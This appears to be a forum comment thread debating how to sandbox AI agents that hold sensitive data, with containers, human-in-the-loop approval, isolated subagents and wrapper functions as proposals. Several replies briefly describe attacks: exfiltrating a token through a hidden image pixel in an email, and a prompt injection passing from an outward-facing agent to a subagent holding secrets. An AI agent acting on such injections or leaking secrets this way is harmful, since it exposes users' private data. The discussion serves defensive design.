Comment by zozbot234
1 day ago
You could run them in a container and put access to highly sensitive personal data behind a "function" that requires a human-in-the-loop for every subsequent interaction. E.g. the access might happen in a "subagent" whose context gets wiped out afterwards, except for a sanitized response that the human can verify.
There might be similar safeguards for posting to external services, which might require direct confirmation or be performed by fresh subagents with sanitized, human-checked prompts and contexts.
So you give it approval to the secret once, how can you be sure it wasn’t sent someplace else / persisted somehow for future sessions?
Say you gave it access to Gmail for the sole purpose of emailing your mom. Are you sure the email it sent didn’t contain a hidden pixel from totally-harmless-site.com/your-token-here.gif?
The access to the secret, the long-term persisting/reasoning and the posting should all be done by separate subagents, and all exchange of data among them should be monitored. But this is easy in principle, since the data is just a plain-text context.
Easy in principle is doing a lot of work here. Splitting things into subagents sounds good in theory, but if a malicious prompt flows through your plain-text context stream, nothing fundamental has changed. If the outward-facing agent gets injected and passes along a reasonable looking instruction to the agent holding secrets, you haven’t improved security at all.
I don't have one yet, but I would just give it access to function calling for things like communication.
Then I can surveil and route the messages at my own discretion.
If I gave it access to email my mom (I did this with an assistant I built after chatgpt launch, actually), I would actually be giving it access to a function I wrote that results in an email.
The function can handle the data anyway it pleases, like for instance stripping HTML